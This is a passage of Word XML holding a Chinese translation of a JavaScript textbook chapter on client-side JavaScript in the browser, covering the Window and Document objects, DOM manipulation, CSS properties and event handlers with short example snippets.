        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章　客户端存储</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章　多媒体和图形编程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="302" w:name="Di_13Zhang__WebLiu_Lan_Qi_Zhong_De_JavaS"/>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">章　</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="302"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书第一部分介绍了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心。第二部分开始转向</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的讨论，通常称为客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>。迄今为止，我们所看到的大部分例子虽然是合法的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，但是却没有特定的上下文，也就是说它们不过是一些运行在不明环境中的代码片段。本章提供了一个可以运行</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的上下文。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在开始讨论</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>之前，有必要先思考一下在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器中是如何呈现</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面的。一些呈现静态信息的页面，叫做文档（</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>由于加入了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScri</w:t>
      </w:r>
      <w:r>
        <w:t>pt</w:t>
      </w:r>
      <w:r>
        <w:t>，静态页面的信息看上去会动来动去，但信息本身是静态的</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>，相对于文档来说，其他</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面则感觉上更像是应用。如果需要的话，这些页面可以动态载入新的信息，因此看起来更加图形化，而非文本化，并且它们可以进行离线操作，以及保存数据到本地，以便再次访问时进行状态恢复。此外，还有其他</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面处于文档和应用的中间，结合了两者的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章以客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>概述开始，包括一个简单的例子，以及对</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>文档和</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用中角色的讨论。概述内容还介绍了哪些内容在后续章节中会有，接下来会详细解释</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>码在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中是如何嵌入并执行的，然后还会介绍兼容性、可访问性和安全性等问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="13_1_Ke_Hu_Duan_JavaScript"/>
      <w:r>
        <w:t>13.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象是所有客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>特性和</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的主要接入点。它表示</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器的一个窗口或窗体，并且可以用标识符</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>来引用它。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了一些属性，比如，指代</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象指定当前显示在窗口中的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，并允许脚本往窗口里载入新的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性，从而跳转到新的</w:t>
      </w:r>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>eb</w:t>
      </w:r>
      <w:r>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.location="http://www.oreilly.com/";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了一些方法，比如</w:t>
      </w:r>
      <w:r>
        <w:t>alert()</w:t>
      </w:r>
      <w:r>
        <w:t>，可以弹出一个对话框用来显示一些信息。还有</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>，可以注册一个函数，在给定的一段时间之后触发一个回调：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>等待两秒，然后说</w:t>
      </w:r>
      <w:r>
        <w:t>hello</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>setTimeout(function(){alert("hello world");},2000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>注意上面的代码并没有显式地使用</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>属性。在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象也是</w:t>
      </w:r>
      <w:r>
        <w:t>全局对象。这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象处于作用域链的顶部，它的属性和方法实际上是全局变量和全局函数。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象有一个引用自身的属性，叫做</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>。如果需要引用窗口对象本身，可以用这个属性，但是如果只是想要引用全局窗口对象的属性，通常并不需要用到</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象还定义了很多其他重要的属性、方法和构造函数，参见第</w:t>
      </w:r>
      <w:r>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:t>章查看完整的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象中其中一个最重要的属性是</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>，它引用</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，后者表示显示在窗口中的文档。</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象有一些重要方法，比如</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>etElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>，可以基于元素</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值返回单一的文档元素（表示</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>标签的一对开始</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>结束标记，以及它们之间的所有内容）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>查找</w:t>
      </w:r>
      <w:r>
        <w:t>id="timestamp"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var timestamp=document.getElementById("timestamp");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象有其他重要的属性和方法，比如允许脚本获取它的内容，设置属性值等：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果元素为空，往里面插入当前的日期和时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(timestamp.firstChild==null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>timestamp.appendChild(document.createTextNode(new Date().toString()));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>查询、遍历和修改文档内容的方法会在第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象都有</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性，允许脚本指定文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式，或修改应用到元素上的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类名。设置这些</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>相关的属性会改变文档元素的呈现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>显式修改目标元素的呈现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>timestamp.style.backgroundColor="yellow";//</w:t>
      </w:r>
      <w:r>
        <w:t>或者只改变类，让样式表指定具体内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>timestamp.className="highlight";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章会介绍</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性，以及其他</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>编程技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象上另一个重要的属性集合是事件处理程序相关的属性。可以在脚本中为之绑定一个函数，这个函数会在某个事件发生时以异步的方式调用。事件处理程序可以让</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码修改窗口、文档和组成文档的元素的</w:t>
      </w:r>
      <w:r>
        <w:t>行为。事件处理程序的属性名是以单词</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>开始的，用法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当用户单击</w:t>
      </w:r>
      <w:r>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r>
        <w:t>元素时，更新它的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>timestamp.onclick=function(){this.innerHTML=new Date().toString();}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序是最重要的事件处理程序之一。当显示在窗口中的文档内容稳定并可以操作时会触发它。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码通常封装在</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序里。第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章将会详细讲述事件。例</w:t>
      </w:r>
      <w:r>
        <w:t>13-1</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序的演示，并展示了客户</w:t>
      </w:r>
      <w:r>
        <w:t>端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实例代码，包括查询文档元素、修改</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类和定义事件处理程序。这个例子的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码是放置在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之内的，且在</w:t>
      </w:r>
      <w:r>
        <w:t>13.2</w:t>
      </w:r>
      <w:r>
        <w:t>节会对它进行解释。注意代码里的一个函数是在另一个函数里定义的。因为事件处理程序的广泛使用，使得嵌套函数在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中非常普遍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>13-1</w:t>
      </w:r>
      <w:r>
        <w:t>：显示内容的简单客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</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style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>本页的</w:t>
      </w:r>
      <w:r>
        <w:t>css</w:t>
      </w:r>
      <w:r>
        <w:t>样式表</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.reveal*{display:</w:t>
      </w:r>
      <w:r>
        <w:t>none;}/*class="reveal"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素的子元素都不显示</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.reveal*.handle{display:block;}/*</w:t>
      </w:r>
      <w:r>
        <w:t>除了</w:t>
      </w:r>
      <w:r>
        <w:t>class="handle"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的页面逻辑在</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件之后启动</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>找到所有</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>名为</w:t>
      </w:r>
      <w:r>
        <w:t>"reveal"</w:t>
      </w:r>
      <w:r>
        <w:t>的容器元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elements=document.getElementsByClassName("reveal");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var </w:t>
      </w:r>
      <w:r>
        <w:t>i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>elements.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>对每个元素进行遍历</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elt=elements[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>找到容器中的</w:t>
      </w:r>
      <w:r>
        <w:t>"handle"</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var title=elt.getElementsByClassName("handle")[0];//</w:t>
      </w:r>
      <w:r>
